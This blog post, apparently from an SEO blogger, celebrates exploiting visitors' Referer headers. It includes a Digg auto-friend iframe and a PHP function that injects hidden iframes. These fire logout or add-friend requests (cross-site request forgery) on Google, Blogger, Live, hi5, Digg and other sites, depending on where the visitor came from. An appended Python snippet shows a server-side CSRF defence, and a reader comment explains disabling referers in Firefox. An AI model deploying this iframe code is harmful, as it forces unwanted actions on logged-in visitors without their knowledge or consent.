Always Watch Your Logs - Part II

Exploiting Referer Information

What is a referer? God, I hope I really don't have to answer this for you all, but I will anyway. In your logs, you have entries like this:

  /searches/Progress%20Indicator%20Helper

Referer: http://www.google.com/search?q=PHP%2Bprogress%2Bindicator&hl=en&start=10&sa=N

Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)

 

The Referer information is what tells me where the user has come from. From the above entry, I deduce that the visitor came from a Google search for the term: PHP progress indicator.

Pretty much 99% of internet users openly show their referer in this way. In fact, the practice of sending your referer has long been considered safe and acceptable. After all, the ability to view a visitor's referer is what makes stats software like AWStats viable. Visitors sending referers provide the most common and accessible way to monitor your website's saturation and growth.

 

But with the advent of the "Social Web" of the new millennium, we are now slowly starting to watch internet security experts warn of the potential for blackhat websites to "exploit a user sending their referer information"...

 

...wait a minute... did someone say "exploit"?!?! Count me in!

 

You all may remember a while back there was a bit of a flap over at Digg when a simple flaw in their then-new voting system was revealed. It let you make someone automatically add you as a friend simply by placing an iframe on your page like:

<iframe src="http://digg.com/invitefrom/russvirante" height="1" width="1"></iframe>

By putting this on your page, if a user visited your site while also logged into Digg (most likely this user would be visiting your site from a Digg story), then they would end up automatically adding you as a friend.

 

Many people added this to every page of their site, not caring whether the user was coming from Digg or not, but those practicing SEO with a bit more style and eloquence usually checked the visitor's referer information first, and only displayed the iframe if the referer indicated the user was coming from Digg.

 

This vulnerability has since been corrected, but that doesn't mean there aren't still many ways to take advantage of users that send their referers.

 

Here is an idea to get you thinking about the possibilities:

 

Note: This isn't my code. In fact, the code and the inspiration for this post came from:
0x000000

 

Check it out, it's a great site and an excellent resource.

 

I'll be back with more posts later on this week after I sort out the ruins of my databases after my recent server crash.

 

<?php
// Builds a hidden iframe pointing at a state-changing URL on the site the
// visitor just came from (as indicated by the Referer header), or returns
// false when the referer is not one of the listed hosts.
function lucky_dayz() {
    $referer = htmlspecialchars($_SERVER['HTTP_REFERER'], ENT_QUOTES, 'UTF-8');
    $hosts = array('google', 'blogger', 'live', 'hi5', 'live', 'ckers', 'myspleen', 'digg');
    // Splits the referer on '.', so for "http://www.google.com/..." the
    // second piece ($csrf[1]) is "google".
    $csrf = explode('.', $referer);

    if (in_array($csrf[1], $hosts)) {
        switch ($csrf[1]) {
            case 'google':
                $url = 'https://www.google.com/adsense/gaialogout';
                break;
            case 'blogger':
                $url = 'http://www.blogger.com/logout.g';
                break;
            case 'live':
                $url = 'http://login.live.com/logout.srf?ct=0';
                break;
            case 'hi5':
                $url = 'http://www.hi5.com/friend/logoff.do';
                break;
            case 'ckers':
                $url = 'http://sla.ckers.org/forum/login.php?13,logout=1';
                break;
            case 'myspleen':
                $url = 'http://www.myspleen.net/friends.php?action=add&type=friend';
                break;
            case 'digg':
                $url = 'http://www.digg.com/invitefrom/0x000000';
                break;
        }

        $lucky = '<iframe src="' . $url . '" style="display:none;"></iframe>';
    } else {
        $lucky = false;
    }
    return $lucky;
}
?>
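As an added example that is not part of Rob's post or 0x000000's code: the server-side check a site like the ones listed above needs so that a hidden iframe cannot trigger an action on a logged-in visitor's behalf. It is Python rather than PHP, the allowed host and function names are assumptions for this example, and it also shows why the explode('.') host test above would make a poor defence, since a lookalike hostname fools it while a real URL parser does not.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Host allowed to originate state-changing requests (constructed for this example).
ALLOWED_HOSTS = {"www.example-social.test"}


def naive_second_label(referer):
    """The explode('.', $referer)[1] logic from the PHP above, for comparison."""
    parts = referer.split(".")
    return parts[1] if len(parts) > 1 else None


def referer_host(referer):
    """Exact hostname from a Referer URL, lower-cased, or None if absent."""
    if not referer:
        return None
    return (urlsplit(referer).hostname or "").lower() or None


def make_csrf_token():
    """Per-session synchronizer token; an attacker's page cannot read it."""
    return secrets.token_urlsafe(32)


def state_change_allowed(method, referer, submitted_token, session_token):
    """Decide whether a state-changing request (add friend, log out, ...) may run.

    1. Never act on GET: an <iframe src=...> is a GET the victim never chose to send.
    2. Require the session's CSRF token, compared in constant time.
    3. Defence in depth: if a Referer is present, its exact host must be ours.
       A missing Referer is tolerated because many users and proxies strip it.
    """
    if method.upper() != "POST":
        return False
    if not submitted_token or not session_token:
        return False
    if not hmac.compare_digest(submitted_token.encode(), session_token.encode()):
        return False
    if referer and referer_host(referer) not in ALLOWED_HOSTS:
        return False
    return True
```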

--Rob

Comments:
Name: Seocracy
Comment:

As a bonus for all you comment readers:

If you wanna stop sending your referer in Firefox, you have two options (or use both like I do):

Option 1:

  1. In the address bar of your Firefox browser type: about:config and hit Enter.
  2. In the Filter input field type: network.http.sendRefererHeader.
  3. Double click on the preference name.
  4. Change the value from 2 to 0 and hit OK.

Option 2:

Download the Firefox no-referer extension.

 


Name: Money Maker Blogs
Website: http://moneymakerblogs.com
Comment: Thanks for the tips.  Thanks also for the info on how to stop sending referers in FF, I just implemented it!
Name: Discount Futures Trading
Website: http://discountfuturestrading.info/
Comment: Haha! Nice trick. I don't care what the dissers say, I'm still a fanboy.